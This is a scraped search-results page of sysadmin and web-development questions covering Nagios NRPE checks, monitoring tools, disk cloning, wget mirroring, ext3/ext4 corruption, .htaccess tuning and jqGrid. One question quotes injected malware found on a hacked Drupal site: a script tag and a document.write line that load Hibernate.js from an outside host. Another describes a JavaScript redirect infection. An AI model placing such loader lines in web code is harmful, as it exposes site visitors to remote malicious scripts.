Search Results

Search found 15743 results on 630 pages for 'js is bad'.

Page 154/630 | < Previous Page | 150 151 152 153 154 155 156 157 158 159 160 161  | Next Page >

  • Nagios returns "No output returned from plugin" running process

    - by user56291
    I have a nagios server and a bunch of nagios clients that i currently monitor. All the clients are setup with the following nrpe configuration. check_users, check_load... metrics are successfully displayed on the nagios interface but check_nginx and check_server_proxy displayed as "Unknown"-(No output returned from plugin). As far as i understood nagios simply runs ps command and looks for either the argument strings or the name of the command to verify whether the service is running. Also with -c flag, one can give nagios a threshold to determine the output (ie: -c 1 returns 'OK' for if it finds at least 1 process.) nrpe_local.cfg: ###################################### # Do any local nrpe configuration here ###################################### allowed_hosts =127.0.0.1,10.0.2.181 command[check_users]=/usr/lib/nagios/plugins/check_users -w 5 -c 10 command[check_load]=/usr/lib/nagios/plugins/check_load -w 15,10,5 -c 30,25,20 command[check_all_disks]=/usr/lib/nagios/plugins/check_disk -w 20% -c 10% command[check_zombie_procs]=/usr/lib/nagios/plugins/check_procs -w 5 -c 10 -s Z command[check_total_procs]=/usr/lib/nagios/plugins/check_procs -w 150 -c 200 command[check_swap]=/usr/lib/nagios/plugins/check_swap -w 50% -c 25% command[check_server_proxy]=/usr/lib/nagios/plugins/check_procs -c 1 -a "api-v1/server.js" command[check_nginx]=/usr/lib/nagios/plugins/check_procs -c 1:30 -C nginx nagios_server.cfg ... define host{ use generic-host ; Name of host template to use host_name plum alias plum address 10.0.2.88 check_command check-host-alive-by-ssh } ... #Check api-proxy-server define service{ use generic-service host_name plum service_description check api proxy service check_command check_nrpe!check_server_proxy } define service { use generic-service ; Name of service template to use host_name plum service_description CHECK_NGINX check_period 24x7 max_check_attempts 3 normal_check_interval 5 retry_check_interval 3 check_command check_nrpe!check_nginx notifications_enabled 1 } Also when i run the command on the nagios client: /usr/lib/nagios/plugins/check_procs -c 1 -a "api-v1/server.js" I get the desired output PROCS OK: 1 process with args 'api-v1/server.js' I would really appreciate any pointers that might help me solve why it nrpe command does not return the desired output on the nagios server panel.

    Read the article

  • Network monitoring tools with API features

    - by Kev
    We use ks-soft's Advanced Hostmonitor package to monitor around 2000 items on our network. We think it's great, the chap that supports it is fantastic, the product is fast, stable and mature but I feel as as we grow as a company it's beginning to show some friction points in the area of integration with our back office admin systems. One of the things we'd like to do is be able to add new tests to whatever monitoring tool we use via an API. For example, when orders for servers come from our retail interface, the server gets built automatically, and as part of the automated build process we'd like to automatically add new tests to the network monitoring systems. Hostmonitor has some support for this via a feature called HM Script but we're starting to encounter some speedbumps - we can't add new operators/users we can't define new "Action Profiles" - these are the actions to be taken when a test goes good or bad. What we love about hostmonitor though are the Action Profiles. For example if a Windows IIS box goes bad our action profile for a bad test does something like: Check host again (one time) Wait another 30 seconds then test again Try restart app pool on remote machine (up to two times) Send an email to ops about the restart failure Try restarting IIS on remote machine (up to four times) Page duty admin (up to 5 times - stops after duty admin ACKS alert) Page backup duty admin (5 times - stops after duty admin ACKS alert) I'm starting to look around at other network monitoring tools and I'm looking for: a comprehensive API to be able to add/remove/control tests/test "action profiles"/operators (not just plugins, we need control and admin interfaces) the ability to have quite detailed action/escalation profiles (and define these via an API) I've looked at Nagios and Icinga but Ican't seem to glean from their documentation whether we could have these features or not, or if we could, how much work would be involved to implement/customise. Can anyone provide any advice, guidance or experiences?

    Read the article

  • I used disk copy to clone my drive, now my windows 7 profile won't load correctly

    - by RzK
    I used easeuse disk copy, after acronis, clonezilla, windows image restore failed me. Basically it copys all sectors, I set it to skip bad sectors(40). The source drive works, it just gave me a couple errors and stopped booting at one point. The drive is an identical copy, minus 40 bad errors. The drive is set to C and active partition, I rebuilt the boot order. I've ran sfc /scannow and ran chkdsk /r chkdsk found 20kb of bad sectors if I remember right. Now the issue I get is when I log into my profile which was saved right, I get a blank light blue wallpaper (non-license) explorer.exe is not running, and there are only 4 processes running in taskmanager, including taskmanager. I would try a repair install but CRTL-E would not open, nothing will open once I force start explorer.exe, almost like all services are down. What should I do? Fresh install is almost not a possibility I will try and fix this issue. sfc /scannow /offbootdir=c:\ /offwindir=c:\windows returns "Windows Resource Protection could not perform the requested operation"

    Read the article

  • WGet or cURL: Mirror Site from http://site.com And No Internal Access

    - by alharaka
    I have tried wget -m wget -r and a whole bunch of variations. I am getting some of the images on http://site.com, one of the scripts, and none of the CSS, even with the fscking -p parameter. The only HTML page is index.html and there are several more referenced, so I am at a loss. curlmirror.pl on the cURL developers website does not seem to get the job done either. Is there something I am missing? I have tried different levels of recursion with only this URL, but I get the feeling I am missing something. Long story short, some school allows its students to submit web projects, but they want to know how they can collect everything for the instructor who will grade it, instead of him going to all the externally hsoted sites. UPDATE: I think I figured out the issue. I though the links to the other pages were in the index.html page that downloaded. I was way off. Turns out the footer of the page, which has all the navigation links, is handled by a JavaScript file Include.js, which reads JLSSiteMap.js and some other JS files to do page navigation and the like. As a result, wget does not pick up an other dependencies because a lot of this crap is handled not on web pages. How can I handle such a website? This is one of several problem cases. I assume little can be done if wget cannot parse JavaScript.

    Read the article

  • nf_conntrack complaints in dmesg

    - by Alexander Gladysh
    While investigating complains on bad HTTP server performance, I've discovered these lines in dmesg of my Xen XCP host that contains a guest OS with said server: [11458852.811070] net_ratelimit: 321 callbacks suppressed [11458852.811075] nf_conntrack: table full, dropping packet. [11458852.819957] nf_conntrack: table full, dropping packet. [11458852.821083] nf_conntrack: table full, dropping packet. [11458852.822195] nf_conntrack: table full, dropping packet. [11458852.824987] nf_conntrack: table full, dropping packet. [11458852.825298] nf_conntrack: table full, dropping packet. [11458852.825891] nf_conntrack: table full, dropping packet. [11458852.826225] nf_conntrack: table full, dropping packet. [11458852.826234] nf_conntrack: table full, dropping packet. [11458852.826814] nf_conntrack: table full, dropping packet. Complains are repeated every five seconds (number of suppressed callbacks is different each time). What can these sympthoms mean? Is that bad? Any hints? (Note that the question is more narrow than "how to solve specific case of bad HTTP server performance", so I do not give more details on that.) Additional info: $ uname -a Linux MYHOST 3.2.0-24-generic #37-Ubuntu SMP Wed Apr 25 08:43:22 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux $ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 12.04 LTS Release: 12.04 Codename: precise $ cat /proc/sys/net/netfilter/nf_conntrack_max 1548576 The server is under about 10M hits / day load.

    Read the article

  • ext4 filesystem corruption -- maybe hardware error?

    - by pts
    I'm getting these errors in dmesg after about half an hour after I turn on the computer: [ 1355.677957] EXT4-fs error (device sda2): htree_dirblock_to_tree: inode #1318420: (comm updatedb.mlocat) bad entry in directory: directory entry across blocks - block=5251700offset=0(0), inode=1802725748, rec_len=179136, name_len=32 [ 1355.677973] Aborting journal on device sda2-8. [ 1355.678101] EXT4-fs (sda2): Remounting filesystem read-only [ 1355.690144] EXT4-fs error (device sda2): htree_dirblock_to_tree: inode #1318416: (comm updatedb.mlocat) bad entry in directory: directory entry across blocks - block=5251699offset=0(0), inode=2194783952, rec_len=53280, name_len=152 [ 1356.864720] EXT4-fs error (device sda2): htree_dirblock_to_tree: inode #1312795: (comm updatedb.mlocat) bad entry in directory: directory entry across blocks - block=5251176offset=1460(13748), inode=1432317541, rec_len=208208, name_len=119 /dev/sda is an SSD, and it's using the noop scheduler. /etc/fstab entry: UUID=acb4eefa-48ff-4ee1-bb5f-2dccce7d011f / ext4 errors=remount-ro,noatime,discard,user_xattr 0 1 System information: $ cat /proc/mounts | grep /dev/sd /dev/sda1 /boot ext2 rw,noatime,errors=continue 0 0 $ cat /etc/lsb-release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=10.04 DISTRIB_CODENAME=lucid DISTRIB_DESCRIPTION="Ubuntu 10.04.3 LTS" $ uname -a Linux leetpad 2.6.35-30-generic-pae #61~lucid1-Ubuntu SMP Thu Oct 13 21:14:29 UTC 2011 i686 GNU/Linux I've run memtest for 7 hours, it didn't found any memory errors. Any obvious ideas what can go wrong in this case? The most reasonable thing I can imagine is that the SSD is silently dropping some write requests, which eventually leads to an EXT4 filesystem inconsistency (but no disk I/O errors). How can this happen? Is there a relevant configuration option I should ensure to be set correctly? What tools should I use to diagnose the hardware failures? Would it be possible to diagnose the SSD failure without overwriting data?

    Read the article

  • Two instances of Windows Vista on boot up after failed clean install

    - by Dwayne
    I tried to install a clean version of Vista but failed. I ended up with Windows and Windows.old on my C: drive and a dual boot option on boot up. I gave up and booted up the old version and tried to rename the Windows.old to Windows and was asked if I wanted to merge the two folders. I answered yes and all seemed OK until I booted up this morning and was given the choice of two versions of Vista. The first one is the one that failed to installed correctly and the second one is the old version. How can I get rid of the failed installation? I got rid of the bad boot via MSCONFIG. Here is my current situation: several hard drives installed Using C: as my boot drive a much larger drive (H:) for storing most of my files. I found a subfolder in my C:\windows folder named windows. Upon inspection I determined it to be older than the C:\windows folder and therefore it must be the older, working version of the boot. I renamed the C:\windows folder to c:\windows.bad and moved the sub windows to the C: root directory. I also copied it to the h: drive. Now MSCONFIG reports that the copy that is booting is the h: copy. How can I change it back to the C:\ copy and can I delete the C:\windows.bad file set?

    Read the article

  • Mac OS X printing to CUPS - More intuitive authentication failure?

    - by Moduspwnens
    We have a network-wide CUPS server that offers authenticated printer access to all our campus users. We've been pretty disappointed with the way Mac clients handle bad printing authentication, though. In any other authentication dialog, when a user types in a bad username or password, the window shakes briefly, allowing the user to re-enter. With printers, this isn't the case. It'll happily accept (and even save to the keychain, if specified) bad credentials. The authentication dialog is dismissed, and the user then has to deal with the print jobs showing up as "On hold (authentication required)". To get their job printed, they need to select it in the printer's queue, click "Resume", then re-enter appropriate credentials. Is there a way to get failed printing authentication to work more intuitively for Mac OS X clients? We're trying to support a BYOD environment, but our end users have been really confused by this. It's made even worse by the way it pre-populates the user's full login name (e.g. "Smith, John"), which tends to make them think to use their local machine passwords.

    Read the article

  • Is something infecting my Google searches?

    - by hippietrail
    I starting doing some experimentation toward making a browser userscript for Google searches and when opening the JavaScript console noticed something that strikes me as very fishy: The page at https://www.google.com.au/search?oq=XYZ&sourceid=chrome&ie=UTF-8&q=XYZ displayed insecure content from http://50.116.62.47/js/chromeServerV45.js. The page at about:blank displayed insecure content from http://96.126.107.154/amz/google.php?callback=a&q=XYZ&country=US. (XYZ is a placeholder for whatever the search terms really was.) Is it likely that I've picked something like a drive-by browser infection? I've tried all kinds of searches for these URLs and other keywords but I've had no luck finding anything conclusive about whether they're malicious or what they are: 50.116.62.47 chromeServerV45.js 96.126.107.154 amz/google.php The only extensions I have installed are either widely used or written by myself. But something else is strange and I'm not sure if it's just a coincidence. I updated my Windows Chrome browser today to version 23.0.1271.64 m and now my Extensions tab as well as my settings tab are blank, so I can't try disabling my extesions. Here's some discussion I've been able to find so far but not really understand and make sense of: for 96.126.107.154 : "anomalous-javascript-pt2"

    Read the article

  • Is it possible to mount a disk image, created with dd, to a directory on a mounted external usb hdd?

    - by Keeper Hood
    I have an image of my home (/dev/sda3) partition, which I've created using the "dd" command. dd if=/dev/sda3 of=/path/to/disk.img I've deleted the home partition via gparted in order to enlarge my /dev/root partition. Then I've recreated the /dev/sda3 partition which is smaller in size then the one I've backed up to the image. I was wondering since I have a 2TB external HDD, could it be possible to mount my backed up image on the external HDD and then copy the files into the /home directory. Since the external HDD would be already in a "mounted state", I'm unsure whether this is a good idea, mounting on a mounted device. I'm running Slackware 13.37 (64bit). used ext4 on all the partitions. resized the root partition with gparted live cd. I've tried mount -t ext4 /path/to/disk.img /mng/image -o loop It gave me an fs error (wrong fs type, bad option, bad superblock on dev/loop/0) Then i did dmesg | tail which outputs: EXT4-fs (loop0) : bad geometry: block count 29009610 exceeds size of defice (1679229 blocks) I have no idea what to do, I want to restore my /home data from the image I've backed up.

    Read the article

  • Windows Media Based video audio converter?

    - by acidzombie24
    This may seem like an odd question. Right now ONLY windows media player, VLC and media player classic opens and plays my audio video correctly. Virtualdub plays it back with the wrong framerate and losses the audio, Avidemux 2.5 seems to be able to dump the audio/video but the video (like all other apps) is either a bad framerate or is wrong (glitches and bad framerate or bad dump). Nothing recognizes the audio file and when playing the video Avidemux (and most other things) die. FFMPEG cant seem to split the video or audio (using copy -an and etc) and this is getting me very angry. VLC dumps the video incorrectly when i try dumping it with that too. What can i use to convert the video? its streaming so it starts at 26mins in and ends at 28 (this is where apps have the problem. They dont know this and fudge everything or crash). I manage to dump the audio with Avidemux but virtualdub and ffmpeg says unreconized codec. Even if i cant convert it (it seems compressed enough) i want to at least attach it back into an AVI.

    Read the article

  • How long will a USB key with an OS installed on it last?

    - by Xananax
    I've heard numerous times that installing an OS on a USB key is a bad thing to do, as USBs typically have a certain number of writes before dying, and installing an OS on it will wear it out (unless it's used sporadically for rescue purposes). Nonetheless, I am very tempted to install some flavour of Linux (Ubuntu or Arch, I haven't decided yet) on a small, transportable, USB Key. My problem is, although you read a lot that it's "bad", you are never told how bad. How long would it last (provided, say, a pc that is 24/7 on)? A month? A year? Five years? Is there recipes to make it last longer? Is there any reason beside weariness that should prevent me from attempting this? I mean, if it can be calculated, then I could theoretically shield myself by doing regular backups on another key when the deadline gets close (for example). Notes I am not talking of using a USB as a live CD, but actually installing the OS on it.) When I say "USB Key", I refer to the little USBs with a flash memory, not an external USB hard drive. For the curious, my reason is that I work in a lot of different places, on different PCs, and I have a very customized session, with my own WM, my own key bindings, my own scripts, , a selection of plugins for firefox and chrome, etc, and currently I am synchronizing all this through a mix of dropbox, git, and transporting files on USBs, and and it's becoming a chore. It would be much simpler for me to just plug the USB and mount the hard disk of the PC I am using and use it's processing power without actually needing to install any OS on it.

    Read the article

  • How can I track down the cause of ext3 filesystem corruption?

    - by Jon Buys
    We have a VMware vSphere 5 environment running CentOS 5.8 virtual machines. In the past two weeks we have had five incidents of virtual machines having a filesytem become corrupt, requiring an fsck to repair. Here is what we see in the logs: Nov 14 14:39:28 hostname kernel: EXT3-fs error (device dm-2): htree_dirblock_to_tree: bad entry in directory #2392098: rec_len is smaller than minimal - offset=0, inode=0, rec_len=0, name_len=0 Nov 14 14:39:28 hostname kernel: Aborting journal on device dm-2. Nov 14 14:39:28 hostname kernel: __journal_remove_journal_head: freeing b_committed_data Nov 14 14:39:28 hostname last message repeated 4 times Nov 14 14:39:28 hostname kernel: ext3_abort called. Nov 14 14:39:28 hostname kernel: EXT3-fs error (device dm-2): ext3_journal_start_sb: Detected aborted journal Nov 14 14:39:28 hostname kernel: Remounting filesystem read-only Nov 14 14:39:28 hostname kernel: EXT3-fs error (device dm-2): htree_dirblock_to_tree: bad entry in directory #2392099: rec_len is smaller than minimal - offset=0, inode=0, rec_len=0, name_len=0 Nov 14 14:31:17 hostname ntpd[3041]: synchronized to 194.238.48.2, stratum 2 Nov 14 15:00:40 hostname kernel: EXT3-fs error (device dm-2): htree_dirblock_to_tree: bad entry in directory #2162743: rec_len is smaller than minimal - offset=0, inode=0, rec_len=0, name_len=0 Nov 14 15:13:17 hostname kernel: __journal_remove_journal_head: freeing b_committed_data The problem seems to happen while we are rsync'ing application data from another server. So far we have been unable to reproduce the problem, or identify a root cause. After we had a few servers have this problem, we assumed that there was an issue with the template, so we scrapped all VM's cloned off of the template, destroyed the template, and built a new template from scratch, installed from a newly downloaded CentOS ISO. We use HP EVA SAN's for datastores, and moved from a 4400 to a 6300 after the first problem. Since the move and rebuilding new virtual machines we have seen the issue twice. On one VM we shut down the server, removed two virtual CPUs, and booted it back up again, the problem presented itself almost immediately. On the other VM, we rebooted it, and the problem happened a half hour later. Any tips or pointers in the right direction would be appreciated.

    Read the article

  • IIS doesn't serve certain file extensions

    - by Alekc
    Hi, i have this weird issue on Win 2k3 server and IIS: Iis has several sites, in one of them i need to create a subdir and set up it as web application. I've noticed that if i create new directory and put some .js/.txt file into it, they will not be served by iis (IE gives an error Internet Explorer cannot display the webpage). If i put the same files in another old site's subdirectory it will show correctly. By sniffing traffic i've seen that iis reply connection state 200 and then drop completely any connection http://domain.com/test2/prova.txt GET /test2/prova.txt HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive HTTP/1.x 200 OK If i rename file prova.txt in prova.asp for example it showing without problems so it shouldn't be permissions issue. After making some researches I've found out that it can be caused by missing mime types, I've checked out .txt and .js are present and served by aspnet_isapi.dll. And here comes another weird thing: if i remove mime mapping from directory's properties it's served correctly, but the same thing doesn't work with js. I'm really beginning to be out of ideas, is there someone who have some hint? Thanks in advance.

    Read the article

  • performance wise htaccess

    - by purpler
    hese's the my htaccess template, i wonder if anything could be added to increase website performance.. # Defaults AddDefaultCharset UTF-8 DefaultLanguage en-US ServerSignature Off FileETag None Header unset ETag Options -MultiViews #Options All -Indexes # Force the latest IE version or ChromeFrame <IfModule mod_setenvif.c> <IfModule mod_headers.c> BrowserMatch MSIE ie Header set X-UA-Compatible "IE=Edge,chrome=1" env=ie </IfModule> </IfModule> # Proxy X-UA Setup <IfModule mod_headers.c> Header append Vary User-Agent </IfModule> #Rewrites Options +FollowSymlinks RewriteEngine On RewriteBase / # Redirect to non-WWW RewriteCond %{HTTPS} !=on RewriteCond %{HTTP_HOST} ^www\.(.+)$ [NC] RewriteRule ^(.*)$ http://%1/$1 [R=301,L] # Redirect to WWW RewriteCond %{HTTP_HOST} ^domain.com RewriteRule (.*) http://www.domain.com/$1 [R=301,L] # Redirect index to root RewriteRule ^(.*)index\.(php|html)$ /$1 [R=301,L] # Caching ExpiresActive On ExpiresDefault A0 Header set Cache-Control "public" # 1 Year Long Cache <FilesMatch "\.(flv|fla|ico|pdf|avi|mov|ppt|doc|mp3|wmv|wav|png|jpg|jpeg|gif|swf|js|css|ttf|eot|woff|svg|svgz)$"> ExpiresDefault A31622400 </FilesMatch> # Proxy Caching <FilesMatch "\.(css|js|png)$"> ExpiresDefault A31622400 Header set Cache-Control "private" </FilesMatch> # Protect against DOS attacks by limiting file upload size LimitRequestBody 10240000 # Proper SVG serving AddType image/svg+xml svg svgz AddEncoding gzip svgz # GZip Compression <IfModule mod_deflate.c> <FilesMatch "\.(php|html|css|js|xml|txt|ttf|otf|eot|svg)$" > SetOutputFilter DEFLATE </FilesMatch> </IfModule> # Error page ErrorDocument 404 /404.html # Deny access to sensitive files <FilesMatch "\.(htaccess|ini|log|psd)$"> Order Allow,Deny Deny from all </FilesMatch>

    Read the article

  • Formatting an external HDD stuck at 70%

    - by mahmood
    My external HDD which is a 250GB WD (powered by USB) seems to have problem! Whenever i try to copy some files, it stuck while copying. I decided to format it. So I used windows tool and performed the format (not quickly) however at nearly 70% it stuck. Then I decided to perform a low level format with lowlevel. Again it stuck at 70%. I endup that the HDD has bad sector. So is there any tool that mark the bad sectors and bypass them? It is not very reasonable to through 250GB because of some bad sectors! P.S: I saw a similar topic but there were no conclusion there either. The smart data is Attribute, raw value, value, threshold, status Read Error Rate, 50, 200, 51, OK Spin-Up Time, 3275, 154, 21, OK Start/Stop Count, 2729, 98, 0, OK Reallocated Sectors Count,0, 200, 140, OK Seek Error Rate, 0, 100, 51, OK Power-On Hours (POH), 1057, 99, 0, OK Spin Retry Count, 0, 100, 51, OK Recalibration Retries ,0, 100, 51 , OK Power Cycle Count, 1385, 99, 0, OK Power-off Retract Count, 425, 200, 0, OK Load /Unload Cycle Count,12974, 196, 0, OK Temperature, 43, 43, 0, OK Reallocation Event Count,0, 200, 0, OK Current Pending Sector Count,23,200, 0, Degradation Uncorrectable Sector Count, 0, 100, 0, OK UltraDMA CRC Error Count,6, 200, 0, OK Write Error Rate/Multi-Zone Error Rate,0,100,51, OK It seems that the most important thing is this line Current Pending Sector Count,23,200, 0, Degradation Any idea on that?

    Read the article

  • Upstart: cannot run as root

    - by Ronni Egeriis
    I have made this upstart script, which starts a Node.js service. But all of the sudden the service has stopped, and upstart has failed to restart it. Now that I am trying to start it manually, it fails to recognize my service: start: Unknown job: queue The script is properly placed in /etc/init, and should have the correct rights: -rw-r--r-- 1 root root 200 Aug 7 13:30 queue.conf When I check the config file with init-checkconf however, it says that it is not able to run as root: root@production1:~# init-checkconf /etc/init/queue.conf ERROR: cannot run as root What causes this error and how do I solve it? Debug info: Ubuntu 12.04.3 LTS root@production1:~# service --version service ver. 0.91-ubuntu1 Edit Here's queue.conf: description "Echo.it command queue" author "Ronni Egeriis Persson <[email protected]>" stop on shutdown respawn respawn 20 5 exec sudo -u beanstalk /usr/bin/node /var/www/queue/index.js >> /var/log/queue.log 2>&1 The command sudo -u beanstalk /usr/bin/node /var/www/queue/index.js >> /var/log/queue.log 2>&1 works fine when run manually.

    Read the article

  • preformance wise htaccess

    - by purpler
    hese's the my htaccess template, i wonder if anything could be added to increase website performance.. # Defaults AddDefaultCharset UTF-8 DefaultLanguage en-US ServerSignature Off FileETag None Header unset ETag Options -MultiViews #Options All -Indexes # Force the latest IE version or ChromeFrame <IfModule mod_setenvif.c> <IfModule mod_headers.c> BrowserMatch MSIE ie Header set X-UA-Compatible "IE=Edge,chrome=1" env=ie </IfModule> </IfModule> # Proxy X-UA Setup <IfModule mod_headers.c> Header append Vary User-Agent </IfModule> #Rewrites Options +FollowSymlinks RewriteEngine On RewriteBase / # Redirect to non-WWW RewriteCond %{HTTPS} !=on RewriteCond %{HTTP_HOST} ^www\.(.+)$ [NC] RewriteRule ^(.*)$ http://%1/$1 [R=301,L] # Redirect to WWW RewriteCond %{HTTP_HOST} ^domain.com RewriteRule (.*) http://www.domain.com/$1 [R=301,L] # Redirect index to root RewriteRule ^(.*)index\.(php|html)$ /$1 [R=301,L] # Caching ExpiresActive On ExpiresDefault A0 Header set Cache-Control "public" # 1 Year Long Cache <FilesMatch "\.(flv|fla|ico|pdf|avi|mov|ppt|doc|mp3|wmv|wav|png|jpg|jpeg|gif|swf|js|css|ttf|eot|woff|svg|svgz)$"> ExpiresDefault A31622400 </FilesMatch> # Proxy Caching <FilesMatch "\.(css|js|png)$"> ExpiresDefault A31622400 Header set Cache-Control "private" </FilesMatch> # Protect against DOS attacks by limiting file upload size LimitRequestBody 10240000 # Proper SVG serving AddType image/svg+xml svg svgz AddEncoding gzip svgz # GZip Compression <IfModule mod_deflate.c> <FilesMatch "\.(php|html|css|js|xml|txt|ttf|otf|eot|svg)$" > SetOutputFilter DEFLATE </FilesMatch> </IfModule> # Error page ErrorDocument 404 /404.html # Deny access to sensitive files <FilesMatch "\.(htaccess|ini|log|psd)$"> Order Allow,Deny Deny from all </FilesMatch>

    Read the article

  • VSFTPD - FTP over TLS - Upload stops after exactly 82k?

    - by Redsandro
    I installed a VSFTP daemon on a CentOS server, using a RSA certificate for logging in using explicit TLS. Now, I cannot upload more than 82k. With files under that limit, there is no problem. The FTP works like a charm. But as soon as a file reaches 82k with FileZilla (81,952 bytes to be exact), the transfer will stop, and the FTP client hangs until time out is reached. FTP client console: 15:10:21 Command: STOR jquery-1.7.2.min.js 15:10:21 Response: 150 Ok to send data. 15:11:21 Error: Connection timed out 15:11:21 Error: File transfer failed after transferring 82 KB in 60 seconds /var/log/vsftpd.log FTP command: Client "x.x.x.x", "STOR jquery-1.7.2.min.js" FTP response: Client "x.x.x.x", "150 Ok to send data." OK UPLOAD: Client "x.x.x.x", "jquery-1.7.2.min.js", 81952 bytes, 1.32Kbyte/sec FTP response: Client "x.x.x.x", "226 File receive OK." // NOT okay, file is bigger // No mention of error here I cannot find relevant info about this problem, apart from a possible problem with trans_chunk_size (not mentioned in default config), but I tried different sizes and it has no impact on the problem. trans_chunk_size=4096 trans_chunk_size=8192 trans_chunk_size=9999 Ofcourse, after every configuration change, I restarted the server: /etc/init.d/vsftpd restart What else can cause this? It's not the latest version, but it's the latest update within the repositories that has been deemed fit for enterprise usage: Package info: $ yum info vsftpd Loaded plugins: fastestmirror Installed Packages Name : vsftpd Arch : x86_64 Version : 2.0.5 Release : 24.el5_8.1 Size : 286 k Repo : installed Summary : vsftpd - Very Secure Ftp Daemon URL : http://vsftpd.beasts.org/ License : GPL Description: vsftpd is a Very Secure FTP daemon. It was written completely from scratch.

    Read the article

  • Strange issue ! Local network cache of PHP and Apache2 on Win Server 2008 R2

    - by Ahmed Benlahsen
    Software configuration : I have a new Server with windows server 2008 R2 installed via VMWare. I have installed Apache2.2, PHP5.2 and MySQL5.5 as separated packages. Issue : On my first installation of my application all works great. When I updated some JS and CSS files then I access to my application again from a PC on local network I get the old JS and CSS versions! But when I access to the same application on local server I got the latest versions of those files! Link of my application on local server is : http://localhost/BADIL Link of my application from local network is : http://LOCAL_SERVER_IP/BADIL I never had this kind of issue! I think that there are some cache but I don't know where! Maybe on Win Server 2008 R2 or on VMWare ! The question is : Why when I access to my application on the server all works fine, but when I access to the same application from a local network I have the old version of JS and CSS files?? Any one can help me please?! Regards.

    Read the article

  • Cookieless Domain redirect in WHM/cPANEL

    - by Patrick Lanfranco
    I am currently trying to get my head around in understanding how to set-up a "cookieless" domain using WHM / Cpanel - unfortunately without any success at this moment. I have a Magento store and I would like to use "cookieless domains" for my media, skin (template) and js files. Magento has a nice feature to define URL for those folders. My current setup is as follows: www.mydomain.com <- main store media.mydomain.com <- subdomain to the media folder (mydomain.com/media/) skin.mydomain.com <- subdomain to the media folder (mydomain.com/skin/) js.mydomain.com <- subdomain to the media folder (mydomain.com/js/) I think it's poinless to have them used as "cookieliess domains" since my Magento installation uses .mydomain.com as cookie domain, so what I would like to achieve is to register a new additional domain and have it point via WHM / cPanel to those specific locations. I have tried to change the A and CNAME records although without any success as they were just simply redirecting from one page to another in the browser (newdomain.com - jump to old.com). What kind of records do I have to set to have this working properly? Some advice would be highly appreciated.

    Read the article

  • Has my site been attacked?

    - by fretje
    This is about an online store based on Drupal 5. All of a sudden it didn't work anymore. Upon accessing the site, this error came up: Parse error: syntax error, unexpected '<' in /home/public_html/index.php on line 38 Upon further inspection I found the following two lines at the end of said index.php: <script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script> <!--7379ba6e55616ea66ac9d812fc0597ba--> After manually removing those 2 lines, the site seems to work fine again. But after more problems (with editing pages) were reported, I found out that actually all the *.js files are "infected". They all contain an extra line at the end: document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>'); Has this site been hacked? Upon googling for "blog.nodisposable.com", nothing interesting comes up. That site itself seems legitimate. It's probably hacked itself? Can anybody explain how this could have happened? What I can do to reverse this? And what I can do to avoid this in the future?

    Read the article

  • DirectAdmin Centos4 server has virus

    - by Rogier21
    Hello all, I have a problem with a webserver that runs Centos4 with DirectAdmin. Since a few weeks some websites hosted on it are not redirecting on search engines properly, they are redirected to some malware site, resulting in a ban from google. Now I have used 3 virusscanners: ClamAV: Didn't find anything Bitdefender: Found a 2-3 files with JS infection, deleted them AVG: Finds lots of files, but doesn't have the option to clean! The virus that it finds is: JS/Redir JS/Dropper Still the strange thing is: website a (www.aa.com) does not have any infected files (have gone through all the files manually, is a custom PHP app, nothing special) but does still have the same virus. Website b (www.bb.com) does have the infected files as only one. I deleted all these files and suspended the account, but no luck, still the same error. I do get the log entries on the website from the searchengines so the DNS entries are not changed. But now I have gone through the httpd files but cannot find anything. Where can I start looking for this?

    Read the article

  • how to reload jqgrid in asp.net mvc when i change dropdownlist

    - by sandeep
    what is wrong in this code? when i change drop down list,the grid takes old value of ddl only, not taken newely selected values why? <%--<asp:Content ID="Content2script" ContentPlaceHolderID="HeadScript" runat="server"> <script type="text/javascript"> $(function() { $("#StateId").change(function() { $('#TheForm').submit(); }); }); $(function() { $("#CityId").change(function() { $('#TheForm').submit(); }); }); $(function() { $("#HospitalName").change(function() { $('#TheForm').submit(); }); }); </script > </asp:Content>--%> <asp:Content ID="Content3" ContentPlaceHolderID="HeadContent" runat="server"> <link rel="stylesheet" type="text/css" href="/scripts/themes/coffee/grid.css" title="coffee" media="screen" /> <script src="/Scripts/jquery-1.3.2.js" type="text/javascript"></script> <script src="/Scripts/jquery.jqGrid.js" type="text/javascript"></script> <script src="/Scripts/js/jqModal.js" type="text/javascript"></script> <script src="/Scripts/js/jqDnR.js" type="text/javascript"></script> <script type="text/javascript"> var gridimgpath = '/scripts/themes/coffee/images'; var gridDataUrl = '/Claim/DynamicGridData/'; jQuery(document).ready(function() { // $("#btnSearch").click(function() { var StateId = document.getElementById('StateId').value; var CityId = document.getElementById('CityId').value; var HName = document.getElementById('HospitalName').value; // alert(CityId); // alert(StateId); // alert(HName); if (StateId > 0 && CityId == '' && HName == '') { CityId = 0; HName = 'Default'.toString(); // alert("elseif0" + HName.toString()); } else if (CityId > 0 && StateId == '') { // alert("elseif1"); alert("Please Select State..") } else if (CityId > 0 && StateId > 0 && HName == '') { // alert("elseif2"); alert(CityId); alert(StateId); HName = "Default"; } else { // alert("else"); StateId = 0; CityId = 0; HName = "Default"; } jQuery("#list").jqGrid({ url: gridDataUrl + '?StateId=' + StateId + '&CityId=' + CityId + '&hospname=' + HName, datatype: 'json', mtype: 'GET', colNames: ['Id', 'HospitalName', 'Address', 'City', 'District', 'FaxNumber', 'PhoneNumber'], colModel: [{ name: 'HospitalId', index: 'HospitalId', width: 40, align: 'left' }, { name: 'HospitalName', index: 'HospitalName', width: 40, align: 'left' }, { name: 'Address1', Address: 'Address1', width: 300 }, { name: 'CityName', index: 'CityName', width: 100 }, { name: 'DistName', index: 'DistName', width: 100 }, { name: 'FaxNo', index: 'FaxNo', width: 100 }, { name: 'ContactNo1', index: 'PhoneNumber', width: 100 } ], pager: jQuery('#pager'), rowNum: 10, rowList: [5, 10, 20, 50], // sortname: 'Id,', 